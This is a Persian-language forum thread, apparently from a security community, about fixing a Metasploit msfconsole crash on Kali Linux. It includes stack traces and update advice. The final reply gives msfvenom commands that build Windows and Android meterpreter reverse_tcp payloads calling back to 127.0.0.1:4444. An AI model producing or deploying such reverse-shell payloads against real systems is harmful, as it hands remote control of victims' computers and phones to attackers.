رفتن به مطلب
برای استفاده از انجمن و عضـویت کلیک کنید.
جستجو در
  • تنظیمات بیشتر ...
نمایش نتایجی که شامل ...
جستجو در ...

جهت دسترسی به فایل ها و آموزش ها ویژه

پست های پیشنهاد شده

سلام دوستان من وقتی میخوام msfconsole رو اجرا کنم با نوشته های زیر مواجه میشم و هر کاری کردم نتونستم مشکل رو حل کنم در لابلای تلاشم یک بار هم اتفاقی درست اجرا شد:

ممنون میشم راهنماییم کنید.

msfconsole

:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
/usr/share/metasploit-framework/lib/msf/core/payload/android.rb:92:in `not_after=': bignum too big to convert into `long' (RangeError)
    from /usr/share/metasploit-framework/lib/msf/core/payload/android.rb:92:in `sign_jar'
    from /usr/share/metasploit-framework/lib/msf/core/payload/android.rb:123:in `generate_jar'
    from /usr/share/metasploit-framework/modules/payloads/singles/android/meterpreter_reverse_https.rb:50:in `generate_jar'
    from /usr/share/metasploit-framework/lib/msf/core/payload/android.rb:38:in `generate'
    from /usr/share/metasploit-framework/lib/msf/core/payload.rb:204:in `size'
    from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:91:in `block in recalculate'
    from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:78:in `each_pair'
    from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:78:in `recalculate'
    from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:251:in `block in load_modules'
    from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:248:in `each'
    from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:248:in `load_modules'
    from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:119:in `block in load_modules'
    from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:117:in `each'
    from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:117:in `load_modules'
    from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:41:in `block in add_module_path'
    from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in `each'
    from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in `add_module_path'
    from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:50:in `block in init_module_paths'
    from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `each'
    from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `init_module_paths'
    from /usr/share/metasploit-framework/lib/msf/ui/console/driver.rb:196:in `initialize'
    from /usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:62:in `new'
    from /usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:62:in `driver'
    from /usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
    from /usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
    from /usr/bin/msfconsole:48:in `<main>'

:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

به اشتراک گذاری این ارسال

لینک به ارسال
به اشتراک گذاری در سایت های دیگر

فکر کنم این ارور از نوع Range-Error باشه.

طول دستورات  ورودیتون رو کم کنید تا بتونه ماژول های داخلی رو بار گذاری کنه (payload-apk)

دیتابیس postgresql رو هم با دستور service postgresql restart

ری استارت کنید شاید جواب داد.

لینک به ارسال

با سلام و خسته نباشید به شما اعضا و مدیران سایت گارد ایران

من میخواستم دستور msfconsole رو در کالی لینوکس اجرا کنم هر کاری میکنم اجرا نمیشه این ارور رو میده

/usr/share/metasploit-framework/lib/msf/core/payload/android.rb:92:in `not_after=': bignum too big to convert into `long' (RangeError)
    from /usr/share/metasploit-framework/lib/msf/core/payload/android.rb:92:in `sign_jar'
    from /usr/share/metasploit-framework/lib/msf/core/payload/android.rb:123:in `generate_jar'
    from /usr/share/metasploit-framework/modules/payloads/singles/android/meterpreter_reverse_https.rb:50:in `generate_jar'
    from /usr/share/metasploit-framework/lib/msf/core/payload/android.rb:38:in `generate'
    from /usr/share/metasploit-framework/lib/msf/core/payload.rb:204:in `size'
    from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:91:in `block in recalculate'
    from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:78:in `each_pair'
    from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:78:in `recalculate'
    from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:251:in `block in load_modules'
    from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:248:in `each'
    from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:248:in `load_modules'
    from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:119:in `block in load_modules'
    from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:117:in `each'
    from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:117:in `load_modules'
    from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:41:in `block in add_module_path'
    from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in `each'
    from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in `add_module_path'
    from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:50:in `block in init_module_paths'
    from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `each'
    from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `init_module_paths'
    from /usr/share/metasploit-framework/lib/msf/ui/console/driver.rb:196:in `initialize'
    from /usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:62:in `new'
    from /usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:62:in `driver'
    from /usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
    from /usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
    from /usr/bin/msfconsole:48:in `<main>'

خیلی تلاش برای حل این مشکل کردم ولی درست نشد که نشد لطفن اگه میشه راهنماییم کنید ممنون میشم

لینک به ارسال

باسلام خدمت دوستان گرامی

بابت تاخیر عذرخواهی میکنم

دوست عزیز این مشکل زمانی پیش میاد که متای شما درست اپدیت نکرده برای اپدیت اون از دستور msfupdate استفاده کن درست میشه و حالا اگر باز درست نشد

service postgresql start

باز اگر درست نشد همینجا بگو تا راحل بهتری ارئه بشه

در سایه حق

لینک به ارسال

با سلام ببخشید شما روبه زحمت انداختم من یه ورژن دیگه از کالی رو دانلود کردم این مشکلات رو نداره فقط در یه جا به مشکل برخوردم.میخوام این فایل رو بسازم و این ارور رو میده invalid payload selected اگه میتونین کمکم کنید با تشکر

image.png.f955865819c90647f2e81a82ecd89b47.png

در 11 ساعت قبل، 0r0b4s گفته است :

باسلام خدمت دوستان گرامی

بابت تاخیر عذرخواهی میکنم

دوست عزیز این مشکل زمانی پیش میاد که متای شما درست اپدیت نکرده برای اپدیت اون از دستور msfupdate استفاده کن درست میشه و حالا اگر باز درست نشد

service postgresql start

باز اگر درست نشد همینجا بگو تا راحل بهتری ارئه بشه

در سایه حق

لینک به ارسال

با سلام

دوست عزیز یکم کد رو تغیر دادم

msfvenom -p windows/meterpreter/reverse_tcp lhost=127.0.0.1 lport=4444 -f exe > /home/user/Desktop/xx.xx

یا این مدلی هم میتونی

./msfvenom -p android/meterpreter/reverse_tcp lhost=127.0.0.1 lport=4444 -f raw -o /tmp/test.apk

باز اگر به مشکل خوردی بگید تا مراحل دیگه هم گفته شه

نکته: برای ساخت پیلود برا اندروید فک کنم فارت گزینه بهتری باشه

درسایه حق

لینک به ارسال